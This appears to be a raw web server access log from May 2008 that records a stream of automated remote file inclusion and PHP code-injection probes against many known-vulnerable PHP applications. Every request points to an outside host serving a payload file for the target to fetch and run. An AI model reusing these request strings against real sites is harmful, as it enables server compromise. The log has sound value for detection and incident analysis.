76.12.32.214 - - [25/May/2008:09:35:44 -0700] "GET //?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.51.3 - - [25/May/2008:09:35:49 -0700] "GET /index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.104.144.28 - - [25/May/2008:09:35:52 -0700] "GET /index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.134.253.108 - - [25/May/2008:09:36:02 -0700] "GET /logs/access_071219.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.51.3 - - [25/May/2008:09:36:03 -0700] "GET /logs/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.51.3 - - [25/May/2008:09:36:03 -0700] "GET /index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.51.3 - - [25/May/2008:09:36:19 -0700] "GET /logs/access_080131.log/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.149.254.30 - - [25/May/2008:09:36:29 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath=http://www.folgoreclan.com/ex/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.254.30 - - [25/May/2008:09:36:29 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath=http://www.folgoreclan.com/ex/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.254.30 - - [25/May/2008:09:36:30 -0700] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath=http://www.folgoreclan.com/ex/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.254.30 - - [25/May/2008:09:36:31 -0700] "GET /logs/access_080201.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath=http://www.folgoreclan.com/ex/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.94.120.198 - - [25/May/2008:09:36:34 -0700] "GET /logs/access_080131.log/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:36:58 -0700] "GET /logs//?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 200 48991 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:37:08 -0700] "GET //?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
198.104.144.28 - - [25/May/2008:09:37:17 -0700] "GET /logs/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
198.104.144.28 - - [25/May/2008:09:37:17 -0700] "GET /index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.84.143.195 - - [25/May/2008:09:37:20 -0700] "GET /logs/access_080131.log/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.120.198 - - [25/May/2008:09:37:22 -0700] "GET /logs/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.120.198 - - [25/May/2008:09:37:22 -0700] "GET /index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [25/May/2008:09:37:40 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [25/May/2008:09:37:40 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [25/May/2008:09:37:40 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.12.244.192 - - [25/May/2008:09:37:44 -0700] "GET /logs/access_080131.log/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.77.9.141 - - [25/May/2008:09:37:48 -0700] "GET /logs/access_080327.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.geocities.com/matrix.cyber90/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
198.104.144.28 - - [25/May/2008:09:38:00 -0700] "GET /logs/access_080131.log/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.84.157.101 - - [25/May/2008:09:38:16 -0700] "GET /logs/access_080131.log/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.149.231.145 - - [25/May/2008:09:38:19 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.17.3.183 - - [25/May/2008:09:38:19 -0700] "GET /home.php?inc=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.149.231.145 - - [25/May/2008:09:38:19 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.77.9.141 - - [25/May/2008:09:38:55 -0700] "GET /logs/access_080327.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.geocities.com/matrix.cyber90/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.166.170.76 - - [25/May/2008:09:39:52 -0700] "GET /logs//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://eazyfonez.com.au/help01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.166.170.76 - - [25/May/2008:09:39:52 -0700] "GET //PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://eazyfonez.com.au/help01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.166.170.76 - - [25/May/2008:09:39:52 -0700] "GET /logs/access_071226.log//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://eazyfonez.com.au/help01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.166.170.76 - - [25/May/2008:09:39:55 -0700] "GET /logs/access_071224.log//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://eazyfonez.com.au/help01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.48.60 - - [25/May/2008:09:40:11 -0700] "GET /logs/home.php?x=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.15.48.60 - - [25/May/2008:09:40:11 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.15.48.60 - - [25/May/2008:09:40:11 -0700] "GET /home.php?x=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.15.48.60 - - [25/May/2008:09:40:11 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
209.12.244.192 - - [25/May/2008:09:40:20 -0700] "GET /logs/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.12.244.192 - - [25/May/2008:09:40:20 -0700] "GET /index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.201.117 - - [25/May/2008:09:40:57 -0700] "GET /logs/%22pricesidwell@yahoo.com%22http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.47.201.117 - - [25/May/2008:09:40:58 -0700] "GET /%22pricesidwell@yahoo.com%22http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:41:02 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:41:02 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:41:02 -0700] "GET /logs/access_071219.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:41:02 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:41:07 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:41:07 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.134.253.108 - - [25/May/2008:09:41:36 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:41:39 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [25/May/2008:09:43:20 -0700] "GET /logs/index.php?option=com_sefservicemap&Itemid=&mosConfig_absolute_path=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.47.201.117 - - [25/May/2008:09:43:24 -0700] "GET /index.php?option=com_sefservicemap&Itemid=&mosConfig_absolute_path=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
69.89.25.171 - - [25/May/2008:09:44:06 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.171 - - [25/May/2008:09:44:06 -0700] "GET //include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.171 - - [25/May/2008:09:44:06 -0700] "GET /logs//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.37.226 - - [25/May/2008:09:44:19 -0700] "GET //editx/add_address.php?include_dir=http://omep.org.ar/boletin/language/bot/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
69.64.37.226 - - [25/May/2008:09:44:19 -0700] "GET /logs//editx/add_address.php?include_dir=http://omep.org.ar/boletin/language/bot/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
82.77.209.226 - - [25/May/2008:09:44:54 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.7.147.137 - - [25/May/2008:09:44:54 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
196.7.147.137 - - [25/May/2008:09:44:54 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
82.77.209.226 - - [25/May/2008:09:44:55 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.77.209.226 - - [25/May/2008:09:44:55 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.72.119.227 - - [25/May/2008:09:44:55 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.72.119.227 - - [25/May/2008:09:44:56 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.72.119.227 - - [25/May/2008:09:44:56 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.77.209.226 - - [25/May/2008:09:45:04 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.77.209.226 - - [25/May/2008:09:45:04 -0700] "GET /errors.php?error=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.77.209.226 - - [25/May/2008:09:45:05 -0700] "GET /logs/errors.php?error=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:45:19 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:45:19 -0700] "GET //include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:45:20 -0700] "GET /logs//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.26.137.64 - - [25/May/2008:09:45:51 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://municoinco.cl/weba/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:46:03 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:46:03 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:46:03 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
58.26.137.64 - - [25/May/2008:09:46:09 -0700] "GET /logs/access_080330.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://municoinco.cl/weba/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [25/May/2008:09:46:10 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://municoinco.cl/weba/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:46:30 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:46:30 -0700] "GET //include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:46:30 -0700] "GET /logs//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.26.137.64 - - [25/May/2008:09:46:34 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://municoinco.cl/weba/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
82.78.216.197 - - [25/May/2008:09:46:39 -0700] "GET /logs/main.php?page=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
82.78.216.197 - - [25/May/2008:09:46:39 -0700] "GET /main.php?page=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
58.26.137.64 - - [25/May/2008:09:46:48 -0700] "GET /logs/access_080330.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://municoinco.cl/weba/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [25/May/2008:09:46:49 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://municoinco.cl/weba/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:46:54 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:46:54 -0700] "GET //include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:46:54 -0700] "GET /logs//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.77.209.226 - - [25/May/2008:09:46:55 -0700] "GET /logs/access.log/errors.php?error=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:47:14 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:47:14 -0700] "GET //include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:47:14 -0700] "GET /logs//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.53.170.223 - - [25/May/2008:09:47:14 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.53.170.223 - - [25/May/2008:09:47:15 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.53.170.223 - - [25/May/2008:09:47:15 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:47:20 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:47:20 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:47:46 -0700] "GET /logs/access_071219.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:47:46 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:47:46 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.53.170.223 - - [25/May/2008:09:47:52 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
143.107.137.222 - - [25/May/2008:09:47:52 -0700] "GET /logs/access_080225.log/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.170.223 - - [25/May/2008:09:47:55 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.53.170.223 - - [25/May/2008:09:47:55 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:47:57 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:47:57 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
143.107.137.222 - - [25/May/2008:09:47:57 -0700] "GET /index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.77.209.226 - - [25/May/2008:09:47:58 -0700] "GET /logs/errors.php?error=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.77.209.226 - - [25/May/2008:09:47:59 -0700] "GET /errors.php?error=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:48:00 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
143.107.137.222 - - [25/May/2008:09:48:03 -0700] "GET /logs/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.170.223 - - [25/May/2008:09:48:43 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.53.170.223 - - [25/May/2008:09:48:43 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.53.170.223 - - [25/May/2008:09:48:48 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.230.93.54 - - [25/May/2008:09:48:58 -0700] "GET //config/dbutil.bck.php?confdir=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.192.125.88 - - [25/May/2008:09:49:41 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.informacione.info/userimgs/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
